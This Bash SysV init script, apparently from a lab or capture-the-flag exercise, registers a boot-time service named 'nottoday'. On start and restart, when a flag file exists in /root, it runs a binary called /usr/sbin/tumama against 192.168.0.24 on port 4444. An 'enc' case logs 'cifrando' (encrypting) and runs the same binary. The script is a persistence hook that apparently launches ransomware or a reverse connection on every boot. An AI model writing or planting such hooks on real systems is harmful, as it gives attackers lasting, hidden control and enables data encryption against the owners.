#! /bin/bash

### BEGIN INIT INFO
# Provides:          nottoday
# Required-Start:    $network
# Required-Stop:
# Default-Start:     2 3 4 5
# Default-Stop:
### END INIT INFO

#. /lib/lsb/init-functions

LOG_FILE="/var/log/nottoday.log"

echo "$(date): corrió nuestro daemon" >> $LOG_FILE

case $1 in
    start|restart|force-reload)
        echo "$(date): corrió $1" >> $LOG_FILE

	if [ -f /root/flag.ntd ];then
		/usr/sbin/tumama 192.168.0.24 4444
	fi
	;;
    stop)
	echo "$(date): se detuvo" >> $LOG_FILE
        ;;
    enc)
	echo "$(date): cifrando uwu" >> $LOG_FILE
        /usr/sbin/tumama 192.168.0.24 4444
	;;
    status)
	echo "$(date): se analizó el estado" >> $LOG_FILE
        exit 0
        ;;
    *)
        echo "Usage: $0 {start|stop|status|restart|force-reload}" >&2
        exit 3
        ;;

esac
